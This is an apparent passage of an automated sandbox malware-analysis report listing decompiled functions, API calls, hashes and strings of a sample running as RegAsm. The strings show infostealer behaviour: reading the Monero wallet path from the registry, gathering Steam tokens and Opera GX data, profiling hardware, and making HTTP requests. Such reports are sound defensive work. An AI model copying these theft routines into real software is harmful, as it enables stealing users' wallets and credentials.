                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                    • String ID: #$Opera GX
                                                                                    • API String ID: 2625060131-1046280356
                                                                                    • Opcode ID: 0d52e54730dc141048d375f83ad8129c69a5083a6e3fd02f50115e121cba97ed
                                                                                    • Instruction ID: 6c82463e2676cb38e72d52ba03d9db1ff071c52b99602dbfe09bc28b63ea1fae
                                                                                    • Opcode Fuzzy Hash: 0d52e54730dc141048d375f83ad8129c69a5083a6e3fd02f50115e121cba97ed
                                                                                    • Instruction Fuzzy Hash: 2A028C7190424CEADF14EBE5D956BDEBBB8AF19308F50417EE405732C2DA781B0C8B66
                                                                                    Function 00413326 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041332B
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00413348
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041340C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrlen
                                                                                    • String ID: ERROR
                                                                                    • API String ID: 2133942097-2861137601
                                                                                    • Opcode ID: 457c7dca167f6097eb3decf56045153080dc014ab3c7bbf54f3f61cdd9435eba
                                                                                    • Instruction ID: 77545b96f9c55e0de6ec71263cb7e0cfa71b0ad252d2fb84a837ede919fdf13f
                                                                                    • Opcode Fuzzy Hash: 457c7dca167f6097eb3decf56045153080dc014ab3c7bbf54f3f61cdd9435eba
                                                                                    • Instruction Fuzzy Hash: 133172B1900148AFCB00EFA9D956BDD7FB4AB15304F10803EF405A7282DB389648CBA9
                                                                                    Function 0041303A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041303F
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                                      • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                      • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                      • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                      • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                      • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                      • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                      • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                    • String ID: ERROR$ERROR
                                                                                    • API String ID: 1120091252-2579291623
                                                                                    • Opcode ID: aefbf7741ce3e4e0e52d37c23a8d594d106d3e01a68b0f1fcaa8373cdeccc4c0
                                                                                    • Instruction ID: 9cf05e6fcab295474e65acada3454b7dde9d8d835f49f967da0029279a9dc82d
                                                                                    • Opcode Fuzzy Hash: aefbf7741ce3e4e0e52d37c23a8d594d106d3e01a68b0f1fcaa8373cdeccc4c0
                                                                                    • Instruction Fuzzy Hash: FC210EB0900189EADB14FFA5C556BDDBBF4AF18348F50417EE80563682DB785B0CCB66
                                                                                    Function 00411001 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                                    • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                    • String ID: 2IA
                                                                                    • API String ID: 3183270410-4174278054
                                                                                    • Opcode ID: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                                    • Instruction ID: 8552e384592846dc61b773d54a0908cfb1ecd9fdbc452b9aa5e823a114c6ff4c
                                                                                    • Opcode Fuzzy Hash: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                                    • Instruction Fuzzy Hash: 85F03079905228BBEB60AB90DC49FDD3B78AB09715F000061BE85A61D0DBB4AAC4CBD4
                                                                                    Function 00414437 Relevance: 6.1, APIs: 4, Instructions: 76sleepsynchronizationthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00413460: _EH_prolog.MSVCRT ref: 00413465
                                                                                    • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                                    • CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$CreateObjectSingleSleepThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 2678630583-0
                                                                                    • Opcode ID: fb7f86a4d038d58da3621eb36abdba5b43a6fdb478c7a05049313af6d209da56
                                                                                    • Instruction ID: 90c6c212f9a98d1f3efa3e19a0f967dde8f702bf728512cfd2e6caf086527d46
                                                                                    • Opcode Fuzzy Hash: fb7f86a4d038d58da3621eb36abdba5b43a6fdb478c7a05049313af6d209da56
                                                                                    • Instruction Fuzzy Hash: 3E311E75900148AFCB11DFA4C995ADEBBB8FF18304F50412FF906A7281DB789B88CB95
                                                                                    Function 00401000 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                    • RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3676486918-0
                                                                                    • Opcode ID: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                    • Instruction ID: 832c21bd40a73018163515ce5beef45c93da2aa0da3d8997035a91abaf75a422
                                                                                    • Opcode Fuzzy Hash: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                    • Instruction Fuzzy Hash: E2F03A79240208FFEB119F91DC0AFAE7B7AEB45B40F104025FB01AA1A0D7B19A109B24
                                                                                    Function 0040FE18 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042667C), ref: 0040FE2C
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042667C,00000000,?), ref: 0040FE33
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
                                                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3676486918-0
                                                                                    • Opcode ID: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                                    • Instruction ID: c6a06fe1a5752460b6d2ee94bc9516a9de2a98ba0b24791e6944b9a77995073e
                                                                                    • Opcode Fuzzy Hash: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                                    • Instruction Fuzzy Hash: 11F05E7A240214FFFB209BD1DD0EFAA7A7EEB45B04F101035FB01A61A1D7B05900DB64
                                                                                    Function 00402308 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 6%@$6%@
                                                                                    • API String ID: 0-3369382886
                                                                                    • Opcode ID: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                                    • Instruction ID: badd9bf96c2c88f43ed760c6ea304aae97d5f1f2e5982ea7d2ae84e0ed7fb19c
                                                                                    • Opcode Fuzzy Hash: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                                    • Instruction Fuzzy Hash: 9C4146716001199FCB01CF69D8806EDBBB1FF89318F1484BADC55EB395C3B8A982CB54
                                                                                    Function 00414538 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041453D
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,0042655B), ref: 0041458E
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    • Soft\Steam\steam_tokens.txt, xrefs: 004145A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                    • String ID: Soft\Steam\steam_tokens.txt
                                                                                    • API String ID: 40794102-3507145866
                                                                                    • Opcode ID: 5dea421be7ed3263a5a25ba242280bcfb85689912c92a282fb01fad9efacc230
                                                                                    • Instruction ID: 1e33fb55044e108cdc823b8717a6e4474b59c1838e8e2ba6a3b9a54ee3721495
                                                                                    • Opcode Fuzzy Hash: 5dea421be7ed3263a5a25ba242280bcfb85689912c92a282fb01fad9efacc230
                                                                                    • Instruction Fuzzy Hash: 61215B71C00148AACB14FBE5C966BDDBB74AF18308F50817EE411725D2DB78174CCA66
                                                                                    Function 004165D9 Relevance: 4.6, APIs: 3, Instructions: 120stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004165DE
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                                    • lstrcat.KERNEL32(?), ref: 0041663F
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 004162AF: _EH_prolog.MSVCRT ref: 004162B4
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 004162D4
                                                                                      • Part of subcall function 004162AF: FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,004268B0), ref: 00416308
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,004268B4), ref: 00416322
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416346
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,00426525), ref: 00416357
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416374
                                                                                      • Part of subcall function 004162AF: PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,004268CC), ref: 004163D9
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,004268D0), ref: 004163FB
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416388
                                                                                      • Part of subcall function 004162AF: FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                      • Part of subcall function 004162AF: FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prologwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                    • String ID:
                                                                                    • API String ID: 25485560-0
